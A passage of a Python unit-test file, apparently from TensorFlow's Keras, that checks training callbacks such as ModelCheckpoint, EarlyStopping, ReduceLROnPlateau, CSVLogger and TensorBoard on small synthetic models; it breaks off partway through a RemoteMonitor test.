y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.test_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.test_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.test_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
    # This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.test_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.test_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
      # This should reduce the LR after the first epoch (due to high min_delta).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)),
0.01,
atol=1e-4)
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.test_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
with open(filepath) as csvfile:
output = ' '.join(csvfile.readlines())
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.test_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.test_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf
def test_TensorBoard(self):
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
yield (x_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
# case: Sequential
with self.test_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=temp_dir, histogram_freq=1, write_images=True,
write_grads=True, batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
# fit with validation data and accuracy
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
# fit generator with validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
callbacks=cbks,
verbose=0)
# fit generator with validation data and accuracy
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data and accuracy
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbks)
assert os.path.exists(temp_dir)
def test_TensorBoard_histogram_freq_must_have_validation_data(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.test_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
inp = keras.Input((INPUT_DIM,))
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
model = keras.models.Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(
log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit w/o validation data should raise ValueError if histogram_freq > 0
cbs = callbacks_factory(histogram_freq=1)
with self.assertRaises(ValueError):
model.fit(
x_train, y_train, batch_size=BATCH_SIZE, callbacks=cbs, epochs=3)
for cb in cbs:
cb.on_train_end()
# fit generator without validation data should raise ValueError if
# histogram_freq > 0
cbs = callbacks_factory(histogram_freq=1)
with self.assertRaises(ValueError):
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbs)
for cb in cbs:
cb.on_train_end()
# Make sure file writer cache is clear to avoid failures during cleanup.
writer_cache.FileWriterCache.clear()
def test_TensorBoard_multi_input_output(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.test_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
else:
yield ([x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
i += 1
i %= max_batch_index
inp1 = keras.Input((INPUT_DIM,))
inp2 = keras.Input((INPUT_DIM,))
inp = keras.layers.add([inp1, inp2])
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output1 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
output2 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
model = keras.models.Model([inp1, inp2], [output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit without validation data
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(x_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(x_train), epochs=2,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
def test_Tensorboard_histogram_summaries_in_test_function(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.steps_seen = []
def add_summary(self, summary, global_step):
summary_obj = summary_pb2.Summary()
# ensure a valid Summary proto is being sent
if isinstance(summary, bytes):
summary_obj.ParseFromString(summary)
else:
assert isinstance(summary, summary_pb2.Summary)
summary_obj = summary
# keep track of steps seen for the merged_summary op,
# which contains the histogram summaries
if len(summary_obj.value) > 1:
self.steps_seen.append(global_step)
def flush(self):
pass
def close(self):
pass
def _init_writer(obj):
obj.writer = FileWriterStub(obj.log_dir)
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
with self.test_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
keras.callbacks.TensorBoard._init_writer = _init_writer
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
self.assertAllEqual(tsb.writer.steps_seen, [0, 0.5, 1, 1.5, 2, 2.5])
def test_Tensorboard_histogram_summaries_with_generator(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
def generator():
x = np.random.randn(10, 100).astype(np.float32)
y = np.random.randn(10, 10).astype(np.float32)
while True:
yield x, y
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(10, input_dim=100, activation='relu'))
model.add(keras.layers.Dense(10, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation generator
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
validation_steps=2,
callbacks=cbks,
verbose=0)
with self.assertRaises(ValueError):
# fit with validation generator but no
# validation_steps
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
callbacks=cbks,
verbose=0)
self.assertTrue(os.path.exists(tmpdir))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.test_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
      # Start an arbitrary thread that should run during model
      # training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(self):
with self.test_session():
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', factor=0.5, patience=4, verbose=1),
keras.callbacks.TensorBoard(log_dir=temp_dir)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert os.path.exists(temp_dir)
def test_Tensorboard_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batches_logged = []
self.summary_values = []
self.summary_tags = []
def add_summary(self, summary, step):
self.summary_values.append(summary.value[0].simple_value)
self.summary_tags.append(summary.value[0].tag)
self.batches_logged.append(step)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir)
tb_cbk.writer = FileWriterStub(temp_dir)
for batch in range(5):
tb_cbk.on_batch_end(batch, {'acc': np.float32(batch)})
self.assertEqual(tb_cbk.writer.batches_logged, [0, 1, 2, 3, 4])
self.assertEqual(tb_cbk.writer.summary_values, [0., 1., 2., 3., 4.])
self.assertEqual(tb_cbk.writer.summary_tags, ['batch_acc'] * 5)
def test_Tensorboard_epoch_and_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summary = (step, summary)
elif 'epoch_' in summary.value[0].tag:
self.epoch_summary = (step, summary)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir)
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': np.float32(5.0)})
tb_cbk.on_epoch_end(0, {'acc': np.float32(10.0)})
batch_step, batch_summary = tb_cbk.writer.batch_summary
self.assertEqual(batch_step, 0)
self.assertEqual(batch_summary.value[0].simple_value, 5.0)
epoch_step, epoch_summary = tb_cbk.writer.epoch_summary
self.assertEqual(epoch_step, 0)
self.assertEqual(epoch_summary.value[0].simple_value, 10.0)
@test_util.run_in_graph_and_eager_modes
def test_Tensorboard_eager(self):
with self.test_session():
temp_dir = tempfile.mkdtemp(dir=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='binary_crossentropy',
optimizer=adam.AdamOptimizer(0.01),
metrics=['accuracy'])
cbks = [keras.callbacks.TensorBoard(log_dir=temp_dir)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertTrue(os.path.exists(temp_dir))
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.test_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
